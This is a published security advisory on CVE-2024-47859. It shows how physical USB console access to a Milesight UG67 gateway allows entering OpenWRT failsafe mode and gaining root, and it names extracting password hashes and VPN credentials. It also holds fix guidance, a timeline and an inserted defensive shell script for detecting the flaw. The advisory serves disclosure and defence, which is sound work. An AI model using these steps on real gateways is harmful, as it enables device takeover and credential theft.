Advisory: Milesight UG67: Privileged Access Using USB Console

Attackers with physical access to the Milesight UG67 Outdoor LoRaWAN Gateway are able to gain full control over the installed operating system using an unprotected USB console.

### Details

- Product: Milesight UG67 Outdoor LoRaWAN Gateway
- Affected Versions: 60.0.0.42-r5, likely others
- Fixed Versions: 60.0.0.44
- Vulnerability Type: Unprotected Local Console
- Security Risk: medium
- Vendor URL: https://www.milesight.com/iot/product/lorawan-gateway/ug67
- Vendor Status: fixed version released
- Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2024-001
- Advisory Status: published
- CVE: CVE-2024-47859
- CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47859

### Introduction

The Milesight UG67 is a robust outdoor LoRaWAN® gateway designed for outdoor deployments.

### More Details

The Milesight UG67 Outdoor LoRaWAN Gateway provides a USB-C socket marked 'Console' below the lower right transparent screw cap. This socket provides a serial interface to the gateway's main CPU via a built-in Silicon Labs CP2102 USB-to-serial converter.

### Proof of Concept

With physical access, it is possible to connect the gateway to an attacker's system via USB and use a serial TTY tool ('tio' in the following) to interact with the device. During power-on or reboot (which can, for example, be achieved by cutting power for a few minutes), it is possible to observe the system startup messages:

```
# tio
Connected
U-Boot SPL 2018.03 (Sep 15 2020 - 15:46:58 +0800)
[...]
Starting kernel ...
Booting Linux on physical CPU 0x0
Linux version 4.14.98 (root@andy) #305 SMP Thu Oct 26 21:01:07 2023
Sotfware : linux-ug6x-2.1.3
[...]
Press the [f] key and hit [enter] to enter failsafe mode
Press the [1], [2], [3] or [4] key and hit [enter] to select the debug level
f
- failsafe -
[...]
root@(none)
BusyBox v1.25.1 (2023-11-01 14:45:57 CST) built-in shell (ash)
================= FAILSAFE MODE active ================
special commands:
* firstboot reset settings to factory defaults
* mount_root mount root-partition with config files
after mount_root:
* passwd change root's password
* /etc/config directory with config files
```

By pressing the 'f' key when prompted, it is possible to enter the failsafe mode of the underlying OpenWRT system. This allows mounting the root filesystem:

```
root@(none):/# mount_root
```

At this point, an attacker has full access to the system. That way, stored account information and password hashes from '/overlay/upper/etc/shadow' or, if present, VPN credentials can be extracted for analysis. With 'root' privileges, it is also possible to freely modify the system, including disabling the firmware upgrade mechanism to prevent future updates from cleaning the device. See [rt-sa-2024-002](https://www.redteam-pentesting.de/advisories/rt-sa-2024-002) for an analysis of the password hashes of the default user accounts.

### Workaround

Mount the UG67 Outdoor LoRaWAN Gateway at a physically secure location, for example indoors, to protect it from physical access.

### Fix

Failsafe mode should be disabled in the OpenWRT configuration using

```
Preinit configuration options -> Disable failsafe
```

as described in the patch.

### Security Risk

With physical access to the Milesight UG67 Outdoor LoRaWAN Gateway, it is possible to gain full control over the installed operating system by briefly attaching a USB interface, rebooting the system and typing the 'f' key. While the requirement for physical access limits the set of possible attackers, the Milesight UG67 Outdoor LoRaWAN Gateway is intended to be mounted outdoors, which exposes it. Due to the precondition of physical access, the unprotected USB console is deemed to pose a medium risk despite the grave consequences for the device.
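As an added example (not part of the advisory or of the vendor's firmware), two shell checks a defender can run offline against a firmware image or a captured console log: one flags the failsafe prompt in a boot log recorded on the USB console, the other tells whether an OpenWrt preinit configuration has failsafe disabled as the fix requires. The option name CONFIG_TARGET_PREINIT_DISABLE_FAILSAFE and the pi_preinit_no_failsafe variable are assumptions about OpenWrt's build system, and all sample inputs are constructed.

```shell
#!/bin/sh
# Added example, not part of the advisory: two offline checks for the failsafe
# console issue (CVE-2024-47859). The sample inputs below are constructed from
# the boot messages quoted in the advisory and from OpenWrt's preinit config.

# Constructed excerpt of a boot log captured on the USB console of an affected
# device (lines taken from the advisory's proof of concept).
AFFECTED_BOOTLOG='U-Boot SPL 2018.03 (Sep 15 2020 - 15:46:58 +0800)
Starting kernel ...
Linux version 4.14.98 (root@andy) #305 SMP Thu Oct 26 21:01:07 2023
Press the [f] key and hit [enter] to enter failsafe mode
Press the [1], [2], [3] or [4] key and hit [enter] to select the debug level'

# Constructed boot log of a build that no longer offers the failsafe prompt.
FIXED_BOOTLOG='U-Boot SPL 2018.03 (Sep 15 2020 - 15:46:58 +0800)
Starting kernel ...
Linux version 4.14.98 (root@andy) #305 SMP Thu Oct 26 21:01:07 2023'

# Prints "affected" if the boot log passed as $1 shows the prompt that lets
# anyone on the console drop into a root shell, "not-affected" otherwise.
bootlog_status() {
    if printf '%s\n' "$1" | grep -q 'hit \[enter\] to enter failsafe mode'; then
        echo affected
    else
        echo not-affected
    fi
}

# Constructed /lib/preinit/00_preinit.conf contents. Assumption: selecting
# "Preinit configuration options -> Disable failsafe" in an OpenWrt build sets
# CONFIG_TARGET_PREINIT_DISABLE_FAILSAFE and appends pi_preinit_no_failsafe="y"
# to this file; confirm against the build tree of the firmware being audited.
PREINIT_CONF_FIXED='pi_ifname="eth0"
pi_ip="192.168.1.1"
pi_preinit_no_failsafe="y"'
PREINIT_CONF_DEFAULT='pi_ifname="eth0"
pi_ip="192.168.1.1"'

# Returns 0 (true) when the preinit config passed as $1 disables failsafe.
preinit_failsafe_disabled() {
    printf '%s\n' "$1" | grep -q '^pi_preinit_no_failsafe="y"$'
}

# Stand-alone run over the constructed samples.
echo "boot log, affected build: $(bootlog_status "$AFFECTED_BOOTLOG")"
echo "boot log, fixed build:    $(bootlog_status "$FIXED_BOOTLOG")"
preinit_failsafe_disabled "$PREINIT_CONF_FIXED" && echo "preinit conf, fixed: failsafe disabled"
preinit_failsafe_disabled "$PREINIT_CONF_DEFAULT" || echo "preinit conf, default: failsafe enabled"
```

On a real device, feed bootlog_status the text captured with tio during a reboot, and preinit_failsafe_disabled the 00_preinit.conf extracted from the firmware's root filesystem.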
### Timeline

- 2024-04-25 Vulnerability identified
- 2024-04-29 Customer approved disclosure to vendor
- 2024-05-14 Vendor notified
- 2024-06-28 Asked vendor for update
- 2024-07-03 Vendor stated: update to be provided by end of July
- 2024-07-24 Asked vendor for update
- 2024-07-30 Vendor stated: work in progress
- 2024-08-09 Vendor stated: fix expected Q3/24
- 2024-09-24 CVE ID requested
- 2024-09-24 Asked vendor for update
- 2024-09-24 Vendor stated: fix in 60.0.0.44
- 2024-10-04 CVE ID assigned
- 2024-10-07 Asked vendor for update
- 2024-10-08 Vendor stated: fix will be available mid-October
- 2024-10-18 Asked vendor for update
- 2024-10-21 Vendor stated: fix will be available mid-November
- 2024-11-04 Vendor released fixed version for testing
- 2024-11-05 Vendor released fixed version
- 2024-12-10 Customer approved public release of vulnerability details
- 2024-12-10 Advisory released

### RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT security experts. In this way, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at:

### Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested, please visit: